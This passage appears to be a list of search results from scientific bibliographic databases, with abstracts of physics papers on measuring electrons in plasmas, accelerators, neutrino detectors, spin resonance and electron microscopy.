time, the ratio of longitudinal diffusion coefficient to mobility epsilon sub(L) = eDsub(L)/μ for electrons in liquid xenon is directly obtained. epsilon sub(L) of electron swarms under the various electric fields have been measured and compared with epsilon sub(T) = eDsub(T)/μ previously obtained under the same electric fields. (Authors) 20. Time-resolved measurements with streaked diffraction patterns from electrons generated in laser plasma wakefield Science.gov (United States) He, Zhaohan; Nees, John; Hou, Bixue; Krushelnick, Karl; Thomas, Alec; Beaurepaire, Benoît; Malka, Victor; Faure, Jérôme 2013-10-01 Femtosecond bunches of electrons with relativistic to ultra-relativistic energies can be robustly produced in laser plasma wakefield accelerators (LWFA). Scaling the electron energy down to sub-relativistic and MeV level using a millijoule laser system will make such electron source a promising candidate for ultrafast electron diffraction (UED) applications due to the intrinsic short bunch duration and perfect synchronization with the optical pump. Recent results of electron diffraction from a single crystal gold foil, using LWFA electrons driven by 8-mJ, 35-fs laser pulses at 500 Hz, will be presented. The accelerated electrons were collimated with a solenoid magnetic lens. By applying a small-angle tilt to the magnetic lens, the diffraction pattern can be streaked such that the temporal evolution is separated spatially on the detector screen after propagation. The observable time window and achievable temporal resolution are studied in pump-probe measurements of photo-induced heating on the gold foil. 1. The measurement of internal conversion electrons of selected nuclei: A physics undergraduate laboratory experience International Nuclear Information System (INIS) Nagy, P.; Duggan, J.L.; Desmarais, D. 1992-01-01 Thin sources are now commercially available for a wide variety of isotopes that have measurable internal conversion coefficients. The authors have used standard surface barrier detectors, NIM electronics, and a personal computer analyzer to measure conversion electrons from a few of these sources. Conversion electrons energy and intensity were measured for 113 Sn, 133 Ba, 137 Cs, and 207 Bi. From the measured spectra the innershell binding energies of the K ampersand L Shell electrons from the daughter nuclei were determined and compared to theory. The relative conversion coefficients a k /a L and the K/L ration were also measured. The spin and parity change of the transitions will also be assigned based on the selection rules of the transitions 2. Measurements of electron density profiles using an angular filter refractometer International Nuclear Information System (INIS) Haberberger, D.; Ivancic, S.; Hu, S. X.; Boni, R.; Barczys, M.; Craxton, R. S.; Froula, D. H. 2014-01-01 A novel diagnostic technique, angular filter refractometry (AFR), has been developed to characterize high-density, long-scale-length plasmas relevant to high-energy-density physics experiments. AFR measures plasma densities up to 10 21  cm −3 with a 263-nm probe laser and is used to study the plasma expansion from CH foil and spherical targets that are irradiated with ∼9 kJ of ultraviolet (351-nm) laser energy in a 2-ns pulse. The data elucidate the temporal evolution of the plasma profile for the CH planar targets and the dependence of the plasma profile on target radius for CH spheres 3. Measurements of electron density profiles using an angular filter refractometer Energy Technology Data Exchange (ETDEWEB) Haberberger, D., E-mail: [email protected]; Ivancic, S.; Hu, S. X.; Boni, R.; Barczys, M.; Craxton, R. S.; Froula, D. H. [Laboratory for Laser Energetics, University of Rochester, Rochester, New York 14636 (United States) 2014-05-15 A novel diagnostic technique, angular filter refractometry (AFR), has been developed to characterize high-density, long-scale-length plasmas relevant to high-energy-density physics experiments. AFR measures plasma densities up to 10{sup 21} cm{sup −3} with a 263-nm probe laser and is used to study the plasma expansion from CH foil and spherical targets that are irradiated with ∼9 kJ of ultraviolet (351-nm) laser energy in a 2-ns pulse. The data elucidate the temporal evolution of the plasma profile for the CH planar targets and the dependence of the plasma profile on target radius for CH spheres. 4. Plasma electron density measurement with multichannel microwave interferometer on the HL-1 tokamak device International Nuclear Information System (INIS) Xu Deming; Zhang Hongyin; Liu Zetian; Ding Xuantong; Li Qirui; Wen Yangxi 1989-11-01 A multichannel microwave interferometer which is composed of different microwave interferometers (one 2 mm band, one 4 mm band and two 8 mm band) has been used to measure the plasma electron density on HL-1 tokamak device. The electron density approaching to 5 x 10 13 cm -3 is measured by a 2 mm band microwave interferometer. In the determinable range, the electron density profile in the cross-section on HL-1 device has been measured by this interferometer. A microcomputer data processing system is also developed 5. Simulations of the electron cloud buildup and its influence on the microwave transmission measurement Energy Technology Data Exchange (ETDEWEB) Haas, Oliver Sebastian, E-mail: [email protected] [GSI Helmholtzzentrum für Schwerionenforschung GmbH, Planckstraße 1, 64291 Darmstadt (Germany); Boine-Frankenheim, Oliver [GSI Helmholtzzentrum für Schwerionenforschung GmbH, Planckstraße 1, 64291 Darmstadt (Germany); Technische Universität Darmstadt, Institut für Theorie Elektromagnetischer Felder, Schlossgartenstraße 8, 64289 Darmstadt (Germany); Petrov, Fedor [Technische Universität Darmstadt, Institut für Theorie Elektromagnetischer Felder, Schlossgartenstraße 8, 64289 Darmstadt (Germany) 2013-11-21 An electron cloud density in an accelerator can be measured using the Microwave Transmission (MWT) method. The aim of our study is to evaluate the influence of a realistic, nonuniform electron cloud on the MWT. We conduct electron cloud buildup simulations for beam pipe geometries and bunch parameters resembling roughly the conditions in the CERN SPS. For different microwave waveguide modes the phase shift induced by a known electron cloud density is obtained from three different approaches: 3D Particle-In-Cell (PIC) simulation of the electron response, a 2D eigenvalue solver for waveguide modes assuming a dielectric response function for cold electrons, a perturbative method assuming a sufficiently smooth density profile. While several electron cloud parameters, such as temperature, result in minor errors in the determined density, the transversely inhomogeneous density can introduce a large error in the measured electron density. We show that the perturbative approach is sufficient to describe the phase shift under realistic electron cloud conditions. Depending on the geometry of the beam pipe, the external magnetic field configuration and the used waveguide mode, the electron cloud density can be concentrated at the beam pipe or near the beam pipe center, leading to a severe over- or underestimation of the electron density. -- Author-Highlights: •Electron cloud distributions are very inhomogeneous, especially in dipoles. •These inhomogeneities affect the microwave transmission measurement results. •Electron density might be over- or underestimated, depending on setup. •This can be quantified with several models, e.g. a perturbative approach. 6. Assembly for the measurement of the most probable energy of directed electron radiation International Nuclear Information System (INIS) Geske, G. 1987-01-01 This invention relates to a setup for the measurement of the most probable energy of directed electron radiation up to 50 MeV. The known energy-range relationship with regard to the absorption of electron radiation in matter is utilized by an absorber with two groups of interconnected radiation detectors embedded in it. The most probable electron beam energy is derived from the quotient of both groups' signals 7. Analysis of recent results of electron cyclotron emission measurements on T.F.R International Nuclear Information System (INIS) 1977-05-01 Recently reported measurements of the electron cyclotron emission from the TFR Tokamak plasma are analyzed and compared to theoretical predictions. The line shape of an optically thick harmonic in a vertical observation is explained by wall reflections, plasma-detector arrangement and reabsorption. Non thermal emission at the electron plasma frequency is related to the presence of a high energy tail in the electron distribution function and might be the cause of the observed reduced runaway creation rate 8. Enclosed Electronic System for Force Measurements in Knee Implants Directory of Open Access Journals (Sweden) David Forchelet 2014-08-01 Full Text Available Total knee arthroplasty is a widely performed surgical technique. Soft tissue force balancing during the operation relies strongly on the experience of the surgeon in equilibrating tension in the collateral ligaments. Little information on the forces in the implanted prosthesis is available during surgery and post-operative treatment. This paper presents the design, fabrication and testing of an instrumented insert performing force measurements in a knee prosthesis. The insert contains a closed structure composed of printed circuit boards and incorporates a microfabricated polyimide thin-film piezoresistive strain sensor for each condylar compartment. The sensor is tested in a mechanical knee simulator that mimics in-vivo conditions. For characterization purposes, static and dynamic load patterns are applied to the instrumented insert. Results show that the sensors are able to measure forces up to 1.5 times body weight with a sensitivity fitting the requirements for the proposed use. Dynamic testing of the insert shows a good tracking of slow and fast changing forces in the knee prosthesis by the sensors. 9. The ELSA laser beamline for electron polarization measurements via Compton backscattering Energy Technology Data Exchange (ETDEWEB) Switka, Michael; Hinterkeuser, Florian; Koop, Rebecca; Hillert, Wolfgang [Electron Stretcher Facility ELSA, Physics Institute of Bonn University (Germany) 2016-07-01 The Electron Stretcher Facility ELSA provides a spin polarized electron beam with energies of 0.5 - 3.2 GeV for double polarization hadron physics experiments. As of 2015, the laser beamline of the polarimeter based on Compton backscattering restarted operation. It consists of a cw disk laser with design total beam power of 40 W and features two polarized 515 nm photon beams colliding head-on with the stored electron beam in ELSA. The polarization measurement is based on the vertical profile asymmetry of the back-scattered photons, which is dependent on the polarization degree of the stored electron beam. After recent laser repairs, beamline and detector modifications, the properties of the beamline have been determined and first measurements of the electron polarization degree were conducted. The beamline performance and first measurements are presented. 10. Measurements of hot electrons in the Extrap T1 reversed-field pinch International Nuclear Information System (INIS) Welander, A.; Bergsaaker, H. 1998-01-01 The presence of an anisotropic energetic electron population in the edge region is a characteristic feature of reversed-field pinch (RFP) plasmas. In the Extrap T1 RFP, the anisotropic, parallel heat flux in the edge region measured by calorimetry was typically several hundred MWm -2 . To gain more insight into the origin of the hot electron component and to achieve time resolution of the hot electron flow during the discharge, a target probe with a soft x-ray monitor was designed, calibrated and implemented. The x-ray emission from the target was measured with a surface barrier detector covered with a set of different x-ray filters to achieve energy resolution. A calibration in the range 0.5-2 keV electron energy was performed on the same target and detector assembly using a LaB 6 cathode electron gun. The calibration data are interpolated and extrapolated numerically. A directional asymmetry of more than a factor of 100 for the higher energy electrons is observed. The hot electrons are estimated to constitute 10% of the total electron density at the edge and their energy distribution is approximated by a half-Maxwellian with a temperature slightly higher than the central electron temperature. Scalings with plasma current, as well as correlations with local Hα measurements and radial dependences, are presented. (author) 11. Measurements of hot electrons in the Extrap T1 reversed-field pinch Science.gov (United States) Welander, A.; Bergsåker, H. 1998-02-01 The presence of an anisotropic energetic electron population in the edge region is a characteristic feature of reversed-field pinch (RFP) plasmas. In the Extrap T1 RFP, the anisotropic, parallel heat flux in the edge region measured by calorimetry was typically several hundred 0741-3335/40/2/011/img1. To gain more insight into the origin of the hot electron component and to achieve time resolution of the hot electron flow during the discharge, a target probe with a soft x-ray monitor was designed, calibrated and implemented. The x-ray emission from the target was measured with a surface barrier detector covered with a set of different x-ray filters to achieve energy resolution. A calibration in the range 0.5-2 keV electron energy was performed on the same target and detector assembly using a 0741-3335/40/2/011/img2 cathode electron gun. The calibration data are interpolated and extrapolated numerically. A directional asymmetry of more than a factor of 100 for the higher energy electrons is observed. The hot electrons are estimated to constitute 10% of the total electron density at the edge and their energy distribution is approximated by a half-Maxwellian with a temperature slightly higher than the central electron temperature. Scalings with plasma current, as well as correlations with local 0741-3335/40/2/011/img3 measurements and radial dependences, are presented. 12. Electron spin relaxation enhancement measurements of interspin distances in human, porcine, and Rhodobacter electron transfer flavoprotein ubiquinone oxidoreductase (ETF QO) Science.gov (United States) Fielding, Alistair J.; Usselman, Robert J.; Watmough, Nicholas; Simkovic, Martin; Frerman, Frank E.; Eaton, Gareth R.; Eaton, Sandra S. 2008-02-01 Electron transfer flavoprotein-ubiquinone oxidoreductase (ETF-QO) is a membrane-bound electron transfer protein that links primary flavoprotein dehydrogenases with the main respiratory chain. Human, porcine, and Rhodobacter sphaeroides ETF-QO each contain a single [4Fe-4S] 2+,1+ cluster and one equivalent of FAD, which are diamagnetic in the isolated enzyme and become paramagnetic on reduction with the enzymatic electron donor or with dithionite. The anionic flavin semiquinone can be reduced further to diamagnetic hydroquinone. The redox potentials for the three redox couples are so similar that it is not possible to poise the proteins in a state where both the [4Fe-4S] + cluster and the flavoquinone are fully in the paramagnetic form. Inversion recovery was used to measure the electron spin-lattice relaxation rates for the [4Fe-4S] + between 8 and 18 K and for semiquinone between 25 and 65 K. At higher temperatures the spin-lattice relaxation rates for the [4Fe-4S] + were calculated from the temperature-dependent contributions to the continuous wave linewidths. Although mixtures of the redox states are present, it was possible to analyze the enhancement of the electron spin relaxation of the FAD semiquinone signal due to dipolar interaction with the more rapidly relaxing [4Fe-4S] + and obtain point-dipole interspin distances of 18.6 ± 1 Å for the three proteins. The point-dipole distances are within experimental uncertainty of the value calculated based on the crystal structure of porcine ETF-QO when spin delocalization is taken into account. The results demonstrate that electron spin relaxation enhancement can be used to measure distances in redox poised proteins even when several redox states are present. 13. First Measurement of Electron Neutrino Appearance in NOvA Science.gov (United States) Adamson, P.; Ader, C.; Andrews, M.; Anfimov, N.; Anghel, I.; Arms, K.; Arrieta-Diaz, E.; Aurisano, A.; Ayres, D. S.; Backhouse, C.; Baird, M.; Bambah, B. A.; Bays, K.; Bernstein, R.; Betancourt, M.; Bhatnagar, V.; Bhuyan, B.; Bian, J.; Biery, K.; Blackburn, T.; Bocean, V.; Bogert, D.; Bolshakova, A.; Bowden, M.; Bower, C.; Broemmelsiek, D.; Bromberg, C.; Brunetti, G.; Bu, X.; Butkevich, A.; Capista, D.; Catano-Mur, E.; Chase, T. R.; Childress, S.; Choudhary, B. C.; Chowdhury, B.; Coan, T. E.; Coelho, J. A. B.; Colo, M.; Cooper, J.; Corwin, L.; Cronin-Hennessy, D.; Cunningham, A.; Davies, G. S.; Davies, J. P.; Del Tutto, M.; Derwent, P. F.; Deepthi, K. N.; Demuth, D.; Desai, S.; Deuerling, G.; Devan, A.; Dey, J.; Dharmapalan, R.; Ding, P.; Dixon, S.; Djurcic, Z.; Dukes, E. C.; Duyang, H.; Ehrlich, R.; Feldman, G. J.; Felt, N.; Fenyves, E. J.; Flumerfelt, E.; Foulkes, S.; Frank, M. J.; Freeman, W.; Gabrielyan, M.; Gallagher, H. R.; Gebhard, M.; Ghosh, T.; Gilbert, W.; Giri, A.; Goadhouse, S.; Gomes, R. A.; Goodenough, L.; Goodman, M. C.; Grichine, V.; Grossman, N.; Group, R.; Grudzinski, J.; Guarino, V.; Guo, B.; Habig, A.; Handler, T.; Hartnell, J.; Hatcher, R.; Hatzikoutelis, A.; Heller, K.; Howcroft, C.; Huang, J.; Huang, X.; Hylen, J.; Ishitsuka, M.; Jediny, F.; Jensen, C.; Jensen, D.; Johnson, C.; Jostlein, H.; Kafka, G. K.; Kamyshkov, Y.; Kasahara, S. M. S.; Kasetti, S.; Kephart, K.; Koizumi, G.; Kotelnikov, S.; Kourbanis, I.; Krahn, Z.; Kravtsov, V.; Kreymer, A.; Kulenberg, Ch.; Kumar, A.; Kutnink, T.; Kwarciancy, R.; Kwong, J.; Lang, K.; Lee, A.; Lee, W. M.; Lee, K.; Lein, S.; Liu, J.; Lokajicek, M.; Lozier, J.; Lu, Q.; Lucas, P.; Luchuk, S.; Lukens, P.; Lukhanin, G.; Magill, S.; Maan, K.; Mann, W. A.; Marshak, M. L.; Martens, M.; Martincik, J.; Mason, P.; Matera, K.; Mathis, M.; Matveev, V.; Mayer, N.; McCluskey, E.; Mehdiyev, R.; Merritt, H.; Messier, M. D.; Meyer, H.; Miao, T.; Michael, D.; Mikheyev, S. P.; Miller, W. H.; Mishra, S. R.; Mohanta, R.; Moren, A.; Mualem, L.; Muether, M.; Mufson, S.; Musser, J.; Newman, H. B.; Nelson, J. K.; Niner, E.; Norman, A.; Nowak, J.; Oksuzian, Y.; Olshevskiy, A.; Oliver, J.; Olson, T.; Paley, J.; Pandey, P.; Para, A.; Patterson, R. B.; Pawloski, G.; Pearson, N.; Perevalov, D.; Pershey, D.; Peterson, E.; Petti, R.; Phan-Budd, S.; Piccoli, L.; Pla-Dalmau, A.; Plunkett, R. K.; Poling, R.; Potukuchi, B.; Psihas, F.; Pushka, D.; Qiu, X.; Raddatz, N.; Radovic, A.; Rameika, R. A.; Ray, R.; Rebel, B.; Rechenmacher, R.; Reed, B.; Reilly, R.; Rocco, D.; Rodkin, D.; Ruddick, K.; Rusack, R.; Ryabov, V.; Sachdev, K.; Sahijpal, S.; Sahoo, H.; Samoylov, O.; Sanchez, M. C.; Saoulidou, N.; Schlabach, P.; Schneps, J.; Schroeter, R.; Sepulveda-Quiroz, J.; Shanahan, P.; Sherwood, B.; Sheshukov, A.; Singh, J.; Singh, V.; Smith, A.; Smith, D.; Smolik, J.; Solomey, N.; Sotnikov, A.; Sousa, A.; Soustruznik, K.; Stenkin, Y.; Strait, M.; Suter, L.; Talaga, R. L.; Tamsett, M. C.; Tariq, S.; Tas, P.; Tesarek, R. J.; Thayyullathil, R. B.; Thomsen, K.; Tian, X.; Tognini, S. C.; Toner, R.; Trevor, J.; Tzanakos, G.; Urheim, J.; Vahle, P.; Valerio, L.; Vinton, L.; Vrba, T.; Waldron, A. V.; Wang, B.; Wang, Z.; Weber, A.; Wehmann, A.; Whittington, D.; Wilcer, N.; Wildberger, R.; Wildman, D.; Williams, K.; Wojcicki, S. G.; Wood, K.; Xiao, M.; Xin, T.; Yadav, N.; Yang, S.; Zadorozhnyy, S.; Zalesak, J.; Zamorano, B.; Zhao, A.; Zirnstein, J.; Zwaska, R.; NOvA Collaboration 2016-04-01 We report results from the first search for νμ→νe transitions by the NOvA experiment. In an exposure equivalent to 2.74 ×1020 protons on target in the upgraded NuMI beam at Fermilab, we observe 6 events in the Far Detector, compared to a background expectation of 0.99 ±0.11 (syst) events based on the Near Detector measurement. A secondary analysis observes 11 events with a background of 1.07 ±0.14 (syst) . The 3.3 σ excess of events observed in the primary analysis disfavors 0.1 π <δC P<0.5 π in the inverted mass hierarchy at the 90% C.L. 14. First Measurement of Electron Neutrino Appearance in NOvA. Science.gov (United States) Adamson, P; Ader, C; Andrews, M; Anfimov, N; Anghel, I; Arms, K; Arrieta-Diaz, E; Aurisano, A; Ayres, D S; Backhouse, C; Baird, M; Bambah, B A; Bays, K; Bernstein, R; Betancourt, M; Bhatnagar, V; Bhuyan, B; Bian, J; Biery, K; Blackburn, T; Bocean, V; Bogert, D; Bolshakova, A; Bowden, M; Bower, C; Broemmelsiek, D; Bromberg, C; Brunetti, G; Bu, X; Butkevich, A; Capista, D; Catano-Mur, E; Chase, T R; Childress, S; Choudhary, B C; Chowdhury, B; Coan, T E; Coelho, J A B; Colo, M; Cooper, J; Corwin, L; Cronin-Hennessy, D; Cunningham, A; Davies, G S; Davies, J P; Del Tutto, M; Derwent, P F; Deepthi, K N; Demuth, D; Desai, S; Deuerling, G; Devan, A; Dey, J; Dharmapalan, R; Ding, P; Dixon, S; Djurcic, Z; Dukes, E C; Duyang, H; Ehrlich, R; Feldman, G J; Felt, N; Fenyves, E J; Flumerfelt, E; Foulkes, S; Frank, M J; Freeman, W; Gabrielyan, M; Gallagher, H R; Gebhard, M; Ghosh, T; Gilbert, W; Giri, A; Goadhouse, S; Gomes, R A; Goodenough, L; Goodman, M C; Grichine, V; Grossman, N; Group, R; Grudzinski, J; Guarino, V; Guo, B; Habig, A; Handler, T; Hartnell, J; Hatcher, R; Hatzikoutelis, A; Heller, K; Howcroft, C; Huang, J; Huang, X; Hylen, J; Ishitsuka, M; Jediny, F; Jensen, C; Jensen, D; Johnson, C; Jostlein, H; Kafka, G K; Kamyshkov, Y; Kasahara, S M S; Kasetti, S; Kephart, K; Koizumi, G; Kotelnikov, S; Kourbanis, I; Krahn, Z; Kravtsov, V; Kreymer, A; Kulenberg, Ch; Kumar, A; Kutnink, T; Kwarciancy, R; Kwong, J; Lang, K; Lee, A; Lee, W M; Lee, K; Lein, S; Liu, J; Lokajicek, M; Lozier, J; Lu, Q; Lucas, P; Luchuk, S; Lukens, P; Lukhanin, G; Magill, S; Maan, K; Mann, W A; Marshak, M L; Martens, M; Martincik, J; Mason, P; Matera, K; Mathis, M; Matveev, V; Mayer, N; McCluskey, E; Mehdiyev, R; Merritt, H; Messier, M D; Meyer, H; Miao, T; Michael, D; Mikheyev, S P; Miller, W H; Mishra, S R; Mohanta, R; Moren, A; Mualem, L; Muether, M; Mufson, S; Musser, J; Newman, H B; Nelson, J K; Niner, E; Norman, A; Nowak, J; Oksuzian, Y; Olshevskiy, A; Oliver, J; Olson, T; Paley, J; Pandey, P; Para, A; Patterson, R B; Pawloski, G; Pearson, N; Perevalov, D; Pershey, D; Peterson, E; Petti, R; Phan-Budd, S; Piccoli, L; Pla-Dalmau, A; Plunkett, R K; Poling, R; Potukuchi, B; Psihas, F; Pushka, D; Qiu, X; Raddatz, N; Radovic, A; Rameika, R A; Ray, R; Rebel, B; Rechenmacher, R; Reed, B; Reilly, R; Rocco, D; Rodkin, D; Ruddick, K; Rusack, R; Ryabov, V; Sachdev, K; Sahijpal, S; Sahoo, H; Samoylov, O; Sanchez, M C; Saoulidou, N; Schlabach, P; Schneps, J; Schroeter, R; Sepulveda-Quiroz, J; Shanahan, P; Sherwood, B; Sheshukov, A; Singh, J; Singh, V; Smith, A; Smith, D; Smolik, J; Solomey, N; Sotnikov, A; Sousa, A; Soustruznik, K; Stenkin, Y; Strait, M; Suter, L; Talaga, R L; Tamsett, M C; Tariq, S; Tas, P; Tesarek, R J; Thayyullathil, R B; Thomsen, K; Tian, X; Tognini, S C; Toner, R; Trevor, J; Tzanakos, G; Urheim, J; Vahle, P; Valerio, L; Vinton, L; Vrba, T; Waldron, A V; Wang, B; Wang, Z; Weber, A; Wehmann, A; Whittington, D; Wilcer, N; Wildberger, R; Wildman, D; Williams, K; Wojcicki, S G; Wood, K; Xiao, M; Xin, T; Yadav, N; Yang, S; Zadorozhnyy, S; Zalesak, J; Zamorano, B; Zhao, A; Zirnstein, J; Zwaska, R 2016-04-15 We report results from the first search for ν_{μ}→ν_{e} transitions by the NOvA experiment. In an exposure equivalent to 2.74×10^{20} protons on target in the upgraded NuMI beam at Fermilab, we observe 6 events in the Far Detector, compared to a background expectation of 0.99±0.11(syst) events based on the Near Detector measurement. A secondary analysis observes 11 events with a background of 1.07±0.14(syst). The 3.3σ excess of events observed in the primary analysis disfavors 0.1π<δ_{CP}<0.5π in the inverted mass hierarchy at the 90% C.L. 15. MAE measurements and studies of magnetic domains by electron microscopy International Nuclear Information System (INIS) Lo, C.C.H. 1998-01-01 There is a pressing need for non-destructive testing (NDT) methods for monitoring steel microstructures as they determine the mechanical properties of steel products. Magnetoacoustic emission (MAE) has potential for this application since it is sensitive to steel microstructure. The aim of this project is to study systematically the dependence of MAE upon steel microstructure, and to apply the technique to examine the industrial steel components which have complicated microstructures. Studies of MAE and Barkhausen emission (BE) were made on several systems including fully pearlitic, fully ferritic, ferritic/pearlitic and spheroidized steels. Results suggest that there is a correlation between the microstructural parameters and the MAE and BE profiles. The study of fully pearlitic steel shows that both MAE and BE are sensitive to the interlamellar spacing of pearlite. Low-carbon ferritic steel samples give different MAE and BE profiles which are dependent on ferrite grain size. Lorentz microscopy reveals that there are differences in domain structures and magnetization processes between fully ferritic and fully pearlitic samples. Study of ferritic/pearlitic samples indicates that both MAE and BE depend on the ferrite content. In the case of spheroidized steel samples MAE and BE profiles were found to be sensitive to the changes in the morphology and size of carbides. Samples of industrial steel products including pearlitic rail steel and decarburized billet were investigated. The MAE profiles obtained from the rail are consistent with those measured from the fully pearlitic rod samples. This suggests that MAE can be used for monitoring the microstructure of large steel components, provided that another technique such as BE is also used to complement the MAE measurements. In the study of the billet samples, MAE and BE were found to be dependent on the decarburization depth. The results are discussed in the context of the change in ferrite content of the surface layer 16. Electron beam induced fluorescence measurements of the degree of hydrogen dissociation in hydrogen plasmas NARCIS (Netherlands) Smit, C.; Brussaard, G.J.H.; de Beer, E.C.M.; Schram, D.C.; Sanden, van de M.C.M. 2004-01-01 The degree of dissociation of hydrogen in a hydrogen plasma has been measured using electron beam induced fluorescence. A 20 kV, 1 mA electron beam excites both the ground state H atom and H2 molecule into atomic hydrogen in an excited state. From the resulting fluorescence the degree of 17. Thin-film thickness measurement using x-ray peak ratioing in the scanning electron microscope International Nuclear Information System (INIS) Elliott, N.E.; Anderson, W.E.; Archuleta, T.A.; Stupin, D.M. 1981-01-01 The procedure used to measure laser target film thickness using a scanning electron microscope is summarized. This method is generally applicable to any coating on any substrate as long as the electron energy is sufficient to penetrate the coating and the substrate produces an x-ray signal which can pass back through the coating and be detected 18. Measurement of single electron and nuclear spin states based on optically detected magnetic resonance Energy Technology Data Exchange (ETDEWEB) Berman, Gennady P [Los Alamos National Laboratory, Los Alamos, NM 87545 (United States); Bishop, Alan R [Los Alamos National Laboratory, Los Alamos, NM 87545 (United States); Chernobrod, Boris M [Los Alamos National Laboratory, Los Alamos, NM 87545 (United States); Hawley, Marilyn E [Los Alamos National Laboratory, Los Alamos, NM 87545 (United States); Brown, Geoffrey W [Los Alamos National Laboratory, Los Alamos, NM 87545 (United States); Tsifrinovich, Vladimir I [Polytechnic University, Brooklyn, NY 11201 (United States) 2006-05-15 A novel approach for measurement of single electron and nuclear spin states is suggested. Our approach is based on optically detected magnetic resonance in a nano-probe located at the apex of an AFM tip. The method provides single electron spin sensitivity with nano-scale spatial resolution. 19. Measurement of single electron and nuclear spin states based on optically detected magnetic resonance International Nuclear Information System (INIS) Berman, Gennady P; Bishop, Alan R; Chernobrod, Boris M; Hawley, Marilyn E; Brown, Geoffrey W; Tsifrinovich, Vladimir I 2006-01-01 A novel approach for measurement of single electron and nuclear spin states is suggested. Our approach is based on optically detected magnetic resonance in a nano-probe located at the apex of an AFM tip. The method provides single electron spin sensitivity with nano-scale spatial resolution 20. Application of Faraday cup array detector in measurement of electron-beam distribution homogeneity International Nuclear Information System (INIS) Xu Zhiguo; Wang Jinchuan; Xiao Guoqing; Guo Zhongyan; Wu Lijie; Mao Ruishi; Zhang Li 2005-01-01 It is described that a kind of Faraday cup array detector, which consists of Faraday cup, suppressor electrode insulation PCB board, Base etc. The homogeneity of electron-beam distribution is measured and the absorbed dose for the irradiated sample is calculated. The results above provide the important parameters for the irradiation experiment and the improvement for the quality of electron beam. (authors) 1. Direct measurement of the charge distribution along a biased carbon nanotube bundle using electron holography DEFF Research Database (Denmark) Beleggia, Marco; Kasama, Takeshi; Dunin-Borkowski, Rafal E. 2011-01-01 Nanowires and nanotubes can be examined in the transmission electron microscope under an applied bias. Here we introduce a model-independent method, which allows the charge distribution along a nanowire or nanotube to be measured directly from the Laplacian of an electron holographic phase image.... 2. Uncertainties of size measurements in electron microscopy characterization of nanomaterials in foods DEFF Research Database (Denmark) Dudkiewicz, Agnieszka; Boxall, Alistair B. A.; Chaudhry, Qasim 2015-01-01 Electron microscopy is a recognized standard tool for nanomaterial characterization, and recommended by the European Food Safety Authority for the size measurement of nanomaterials in food. Despite this, little data have been published assessing the reliability of the method, especially for size...... measurement of nanomaterials characterized by a broad size distribution and/or added to food matrices. This study is a thorough investigation of the measurement uncertainty when applying electron microscopy for size measurement of engineered nanomaterials in foods. Our results show that the number of measured... 3. In-situ measurements of the secondary electron yield in an accelerator environment: Instrumentation and methods International Nuclear Information System (INIS) Hartung, W.H.; Asner, D.M.; Conway, J.V.; Dennett, C.A.; Greenwald, S.; Kim, J.-S.; Li, Y.; Moore, T.P.; Omanovic, V.; Palmer, M.A.; Strohman, C.R. 2015-01-01 The performance of a particle accelerator can be limited by the build-up of an electron cloud (EC) in the vacuum chamber. Secondary electron emission from the chamber walls can contribute to EC growth. An apparatus for in-situ measurements of the secondary electron yield (SEY) in the Cornell Electron Storage Ring (CESR) was developed in connection with EC studies for the CESR Test Accelerator program. The CESR in-situ system, in operation since 2010, allows for SEY measurements as a function of incident electron energy and angle on samples that are exposed to the accelerator environment, typically 5.3 GeV counter-rotating beams of electrons and positrons. The system was designed for periodic measurements to observe beam conditioning of the SEY with discrimination between exposure to direct photons from synchrotron radiation versus scattered photons and cloud electrons. The samples can be exchanged without venting the CESR vacuum chamber. Measurements have been done on metal surfaces and EC-mitigation coatings. The in-situ SEY apparatus and improvements to the measurement tools and techniques are described 4. In-situ measurements of the secondary electron yield in an accelerator environment: Instrumentation and methods Energy Technology Data Exchange (ETDEWEB) Hartung, W.H., E-mail: [email protected]; Asner, D.M.; Conway, J.V.; Dennett, C.A.; Greenwald, S.; Kim, J.-S.; Li, Y.; Moore, T.P.; Omanovic, V.; Palmer, M.A.; Strohman, C.R. 2015-05-21 The performance of a particle accelerator can be limited by the build-up of an electron cloud (EC) in the vacuum chamber. Secondary electron emission from the chamber walls can contribute to EC growth. An apparatus for in-situ measurements of the secondary electron yield (SEY) in the Cornell Electron Storage Ring (CESR) was developed in connection with EC studies for the CESR Test Accelerator program. The CESR in-situ system, in operation since 2010, allows for SEY measurements as a function of incident electron energy and angle on samples that are exposed to the accelerator environment, typically 5.3 GeV counter-rotating beams of electrons and positrons. The system was designed for periodic measurements to observe beam conditioning of the SEY with discrimination between exposure to direct photons from synchrotron radiation versus scattered photons and cloud electrons. The samples can be exchanged without venting the CESR vacuum chamber. Measurements have been done on metal surfaces and EC-mitigation coatings. The in-situ SEY apparatus and improvements to the measurement tools and techniques are described. 5. Measurements of picosecond pulses of a high-current electron accelerator International Nuclear Information System (INIS) Zheltov, K.A.; Petrenko, A.N.; Turundaevskaya, I.G.; Shalimanov, V.F. 1997-01-01 The duration of a picosecond high-current accelerator electron beam pulse duration is measured and its shape is determined using a measuring line, comprising a Faraday cup, a radiofrequency cable of minor length and a wide-band SRG-7 oscillograph. The procedure of data reconstruction according to regularization method is applied to determine the actual shape of the pulse measured 6. Electron transport parameters in CO$_2$: scanning drift tube measurements and kinetic computations OpenAIRE Vass, M.; Korolov, I.; Loffhagen, D.; Pinhao, N.; Donko, Z. 2016-01-01 This work presents transport coefficients of electrons (bulk drift velocity, longitudinal diffusion coefficient, and effective ionization frequency) in CO2 measured under time-of-flight conditions over a wide range of the reduced electric field, 15Td 7. Calibration of Fabry-Perot interferometers for electron cyclotron emission measurements on the Tore Supra tokamak International Nuclear Information System (INIS) Javon, C.; Talvard, M. 1990-01-01 The electron temperature is routinely measured on TORE SUPRA using Fabry-Perot cavities. These have been calibrated using a technique involving coherent addition and Fourier analysis of a chopped black-body source. Comparison with conventional techniques is reported 8. Measurement of Wake fields in Plasma by a Probing Electron Beam International Nuclear Information System (INIS) Kiselev, V.A.; Linnik, A.F.; Onishchenko, I.N.; Uskov, V.V. 2006-01-01 The device for measuring intensity of wakefield, excited in plasma by a sequence of bunches of relativistic electrons is presented. Field amplitude is determined by measuring deflection of a probing electron beam (10 keV, 50 μA, of 1 mm diameter), which is injected perpendicularly to a direction of bunches movement. Results of measurement of focusing radial wakefield excited in plasma of density 5 x 10 11 cm - 3 by a sequence of needle electron bunches (each bunch of length 10 mm, diameter 1.5 mm, energy 14 MeV, 2 x 10 9 electrons in bunch, number of bunches 1500) are given. The measured radial wakefield strength was 2.5 kV/cm 9. Measurement of electron blockage factors for mamma scars; Medida de los factores de bloque de electrones para cicatrices de mama Energy Technology Data Exchange (ETDEWEB) Marques Fraguela, E; Suero Rodrigo, M A 2011-07-01 